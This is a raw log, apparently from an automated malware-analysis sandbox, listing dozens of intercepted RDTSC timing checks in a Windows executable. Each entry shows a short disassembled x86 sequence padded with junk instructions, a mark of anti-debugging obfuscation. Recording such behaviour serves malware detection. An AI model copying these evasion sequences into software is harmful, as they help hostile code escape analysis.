Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50809DD second address: 50809E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50809E3 second address: 5080A1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F5C32F5CA61h 0x0000000e jmp 00007F5BC10B70A7h 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5BC10B70A0h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080A1F second address: 5080A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080A23 second address: 5080A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080A29 second address: 5080A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080A2F second address: 5080A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov ecx, 47B5C90Dh 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 mov edi, ecx 0x00000017 mov ax, 7B27h 0x0000001b popad 0x0000001c xchg eax, ebx 0x0000001d jmp 00007F5BC10B709Ah 0x00000022 xchg eax, ebx 0x00000023 jmp 00007F5BC10B70A0h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F5BC10B709Eh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080A8B second address: 5080A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080A91 second address: 5080A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080A95 second address: 5080A99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080AF4 second address: 5080AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080AF8 second address: 5080AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080AFC second address: 5080B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080B02 second address: 5080B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080B08 second address: 5080B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080B23 second address: 5080B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080B27 second address: 5080B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080B2D second address: 5080B5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esp, ebp 0x0000000c jmp 00007F5BC10A35FCh 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5BC10A3607h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090E0F second address: 5090E69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5BC10B70A1h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F5BC10B70A1h 0x0000000f and eax, 6C1D6216h 0x00000015 jmp 00007F5BC10B70A1h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 movzx eax, dx 0x00000024 push eax 0x00000025 push edx 0x00000026 call 00007F5BC10B709Fh 0x0000002b pop ecx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090E69 second address: 5090E6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090E6D second address: 5090EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5BC10B709Eh 0x00000011 adc si, D098h 0x00000016 jmp 00007F5BC10B709Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F5BC10B70A8h 0x00000022 or ax, 7AF8h 0x00000027 jmp 00007F5BC10B709Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090BF7 second address: 5090C09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A35FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090C09 second address: 5090C4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F5BC10B70A6h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5BC10B70A7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090C4C second address: 5090C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A3604h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 51107B4 second address: 51107BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 51107BA second address: 51107D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 51007E7 second address: 5100874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BC10B70A0h 0x00000009 xor ax, 0778h 0x0000000e jmp 00007F5BC10B709Bh 0x00000013 popfd 0x00000014 mov bx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c mov dx, cx 0x0000001f mov ebx, eax 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 jmp 00007F5BC10B709Fh 0x00000029 push ecx 0x0000002a push edi 0x0000002b pop esi 0x0000002c pop edi 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 jmp 00007F5BC10B709Ch 0x00000035 movzx eax, dx 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b pushad 0x0000003c mov dh, 71h 0x0000003e pushad 0x0000003f call 00007F5BC10B70A2h 0x00000044 pop esi 0x00000045 mov ax, dx 0x00000048 popad 0x00000049 popad 0x0000004a pop ebp 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F5BC10B709Fh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5100874 second address: 5100891 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5100C06 second address: 5100C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5100C0A second address: 5100C10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5100C10 second address: 5100C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F5BC10B70A3h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F5BC10B70A6h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov ax, 78CDh 0x0000001e pushfd 0x0000001f jmp 00007F5BC10B709Ah 0x00000024 jmp 00007F5BC10B70A5h 0x00000029 popfd 0x0000002a popad 0x0000002b push dword ptr [ebp+0Ch] 0x0000002e pushad 0x0000002f push esi 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5100C76 second address: 5100C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov edx, eax 0x00000007 popad 0x00000008 push dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov dl, D8h 0x0000000f pop ecx 0x00000010 movsx edx, ax 0x00000013 popad 0x00000014 push EBF1B5B1h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5BC10A35FAh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5100C9B second address: 5100CA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5100CA1 second address: 5100CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5100CA5 second address: 5100CA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5100CA9 second address: 5100CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 140F4A51h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5100CBE second address: 5100CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5100CC4 second address: 5100CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5100CEC second address: 5100CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5100CF0 second address: 5100D0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3607h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5100D0B second address: 5100D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B70A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0573 second address: 50B0598 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5BC10A3601h 0x00000008 pop eax 0x00000009 mov bh, A6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 push eax 0x00000014 push edx 0x00000015 mov si, 43A7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0598 second address: 50B0617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F5BC10B709Fh 0x0000000f sbb ecx, 62E64EEEh 0x00000015 jmp 00007F5BC10B70A9h 0x0000001a popfd 0x0000001b call 00007F5BC10B70A0h 0x00000020 pushad 0x00000021 popad 0x00000022 pop ecx 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F5BC10B70A7h 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d jmp 00007F5BC10B70A4h 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0617 second address: 50B06AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push FFFFFFFEh 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop esi 0x0000000b mov ecx, edi 0x0000000d popad 0x0000000e push 3CB6DE44h 0x00000013 jmp 00007F5BC10A35FAh 0x00000018 add dword ptr [esp], 3A42E1D4h 0x0000001f jmp 00007F5BC10A3600h 0x00000024 push 52A31B2Bh 0x00000029 jmp 00007F5BC10A3601h 0x0000002e xor dword ptr [esp], 2453B52Bh 0x00000035 pushad 0x00000036 mov ecx, 4A3D7693h 0x0000003b mov cx, E8EFh 0x0000003f popad 0x00000040 mov eax, dword ptr fs:[00000000h] 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F5BC10A3600h 0x0000004d adc esi, 04558318h 0x00000053 jmp 00007F5BC10A35FBh 0x00000058 popfd 0x00000059 mov dl, ah 0x0000005b popad 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F5BC10A35FAh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B06AF second address: 50B06B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B06B3 second address: 50B06B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B06B9 second address: 50B0708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 6E53h 0x00000007 pushfd 0x00000008 jmp 00007F5BC10B70A8h 0x0000000d sbb ecx, 405007D8h 0x00000013 jmp 00007F5BC10B709Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F5BC10B70A5h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0708 second address: 50B073C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5BC10A3608h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B073C second address: 50B0740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0740 second address: 50B0746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0746 second address: 50B0772 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F5BC10B70A0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov si, A1C3h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0772 second address: 50B07E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b call 00007F5BC10A35FCh 0x00000010 pushfd 0x00000011 jmp 00007F5BC10A3602h 0x00000016 xor si, 22E8h 0x0000001b jmp 00007F5BC10A35FBh 0x00000020 popfd 0x00000021 pop esi 0x00000022 mov dh, F3h 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushfd 0x0000002a jmp 00007F5BC10A35FCh 0x0000002f sbb ax, 3548h 0x00000034 jmp 00007F5BC10A35FBh 0x00000039 popfd 0x0000003a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B07E3 second address: 50B082F instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5BC10B70A9h 0x00000013 jmp 00007F5BC10B709Bh 0x00000018 popfd 0x00000019 jmp 00007F5BC10B70A8h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B082F second address: 50B088C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F5BC10A3606h 0x0000000f xchg eax, edi 0x00000010 jmp 00007F5BC10A3600h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F5BC10A35FCh 0x0000001f add ecx, 67D109F8h 0x00000025 jmp 00007F5BC10A35FBh 0x0000002a popfd 0x0000002b mov ebx, ecx 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B088C second address: 50B08A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B70A0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B08A0 second address: 50B08D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F5BC10A3607h 0x0000000e mov eax, dword ptr [76FBB370h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5BC10A3600h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B08D9 second address: 50B08DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B08DF second address: 50B08E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B08E5 second address: 50B0927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [ebp-08h], eax 0x0000000b jmp 00007F5BC10B70A4h 0x00000010 xor eax, ebp 0x00000012 jmp 00007F5BC10B70A1h 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5BC10B709Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0927 second address: 50B092C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B092C second address: 50B0960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c mov si, 8531h 0x00000010 mov dx, ax 0x00000013 popad 0x00000014 pushad 0x00000015 mov edx, eax 0x00000017 jmp 00007F5BC10B70A4h 0x0000001c popad 0x0000001d popad 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0960 second address: 50B0964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0964 second address: 50B0981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0981 second address: 50B0A14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F5BC10A35FAh 0x00000014 jmp 00007F5BC10A3605h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F5BC10A3600h 0x00000020 sub esi, 3C807758h 0x00000026 jmp 00007F5BC10A35FBh 0x0000002b popfd 0x0000002c popad 0x0000002d movzx eax, bx 0x00000030 popad 0x00000031 mov dword ptr fs:[00000000h], eax 0x00000037 pushad 0x00000038 mov cl, dh 0x0000003a jmp 00007F5BC10A35FAh 0x0000003f popad 0x00000040 mov esi, dword ptr [ebp+08h] 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F5BC10A3607h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0A14 second address: 50B0A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov bh, 2Ch 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+10h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5BC10B70A9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0A3C second address: 50B0AA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5BC10A3607h 0x00000008 pop esi 0x00000009 call 00007F5BC10A3609h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 test eax, eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F5BC10A35FDh 0x0000001b xor ax, E076h 0x00000020 jmp 00007F5BC10A3601h 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 movzx eax, dx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0AA1 second address: 50B0AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F5C32EC6314h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0AB2 second address: 50B0AB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0AB8 second address: 50B0B84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5BC10B70A7h 0x00000012 and eax, 015F7BBEh 0x00000018 jmp 00007F5BC10B70A9h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F5BC10B70A0h 0x00000024 or ax, 94B8h 0x00000029 jmp 00007F5BC10B709Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov dword ptr [ebp-20h], eax 0x00000033 jmp 00007F5BC10B70A6h 0x00000038 mov ebx, dword ptr [esi] 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d mov esi, ebx 0x0000003f pushfd 0x00000040 jmp 00007F5BC10B70A9h 0x00000045 and si, 58B6h 0x0000004a jmp 00007F5BC10B70A1h 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0B84 second address: 50B0B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0008 second address: 50B000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B000C second address: 50B0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
